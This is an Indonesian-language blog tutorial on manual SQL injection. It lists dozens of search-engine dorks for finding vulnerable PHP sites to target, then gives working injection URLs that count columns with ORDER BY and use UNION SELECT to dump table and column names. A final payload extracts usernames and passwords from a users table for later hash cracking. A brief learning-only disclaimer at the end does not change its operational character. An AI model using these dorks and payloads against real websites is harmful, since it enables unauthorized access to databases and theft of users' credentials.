Teknik Hacking SQL Injection Manual

 Teknik Hacking SQL Injection Manual

Berikut ini teknik tutorial teknik hacking cara menggunakan SQL Injection Manual :

1. Untuk melakukan teknik ini anda membutuhkan :

• Handphone / Laptop
• Data Internet 
• Dork / Search Enggine Teknik Hacking

2. Gunakan handphone / laptop anda untuk mencari target sebuah situs website menggunakan data internet anda.

3. Carilah sebuah target situs website menggunakan dork / search enggine teknik hacking. Anda bisa menggunakan dork / search enggine teknik hacking di bawah ini :

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:rtray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=

4. Contoh saya menggunakan situs website target saya sendiri :

https://examplesitus.com/article.php?id=17

6. Kemudian anda cek dulu websitenya, apakah situs web itu rentan terhadap SQL Injection atau tidak. Cara cek apakah website itu vuln terhadap SQL Injection dengan memberi tanda (') di belakang situs website target anda. Contoh :

https://examplesitus.com/article.php?id=17'

7. Apabila jika situs web itu rentan terhadap SQL Injection terdapat halaman sebuah website itu akan terdapat sebuah pesan error / blank. Jika situs web itu tidak rentan terhadap SQL Injection biasanya halaman sebuah website itu normal.

8. Mencari dan menghitung jumlah tabel yang terdapat dalam database website. Apabila jumlah error atau hilang pesan error berarti itu jumlah tabel database di website. Contoh :

https://examplesitus.com/article.php?id=17+order+by+1--+-

https://examplesitus.com/article.php?id=17+order+by+2--+-

https://examplesitus.com/article.php?id=17+order+by+3--+-

https://examplesitus.com/article.php?id=17+order+by+4--+-

https://examplesitus.com/article.php?id=17+order+by+5--+-

https://examplesitus.com/article.php?id=17+order+by+6--+-

https://examplesitus.com/article.php?id=17+order+by+7--+-

https://examplesitus.com/article.php?id=17+order+by+8--+- => Halaman website error

berarti yang kita ambil adalah sampai angka 7, karena di halaman website selanjutnya error.

9. Untuk mencari dalam mengeluarkan angka berapa yang muncul. Apabila tadi website yang error sampai angka 8, maka kita harus menggunakan kode ini sebelum angka 8.

https://examplesitus.com/article.php?id=-17+union+select+1,2,3,4,5,6,7--+-

10. Apabila jika angka yang keluar adalah angka 3. Gunakan kode ini untuk mencari versi dan tabel database. Kemudian anda gunakan kode Commanf SQL Injection ini :

• @@version => menampilkan versi database.
• user() => menampilkan nama user database.
• @@hostname => menampilkan hostname.
• @@tmpdir => menampilkan direktori temp.
• @@datadir => menampilkan  direktori data.
• @@basedir => menampilkan direktori base.
• database() => menampilkan nama database.
• schema() => menampilkan database yang dipakai.
• session_user() => menampilkan session user.

https://examplesitus.com/article.php?id=-17+union+select+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7--+-

11. Untuk mencari username dan password database, gunakan kode ini :

https://examplesitus.com/article.php?id=-17+union+select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),4,5,6,7--+-

12. Apabila kita sudah mencari usernamw dan password database, kemudian password-nya kita menggunakan link Hash ini

 

Materi ini hanya digunakan untuk sebagai media untuk pembelajaran. Dimohon untuk tidak melakukan kepada target situs website berbasis aplikasi. Kami tidak akan bertanggung jawab atas tindakan hacking, apapun yang anda kalian lakukan !!!.

Rizki M Farhan Saya adalah seorang penulis konten artikel untuk belajar yang membahas Teknologi Layanan Pendidikan Internet.

Share :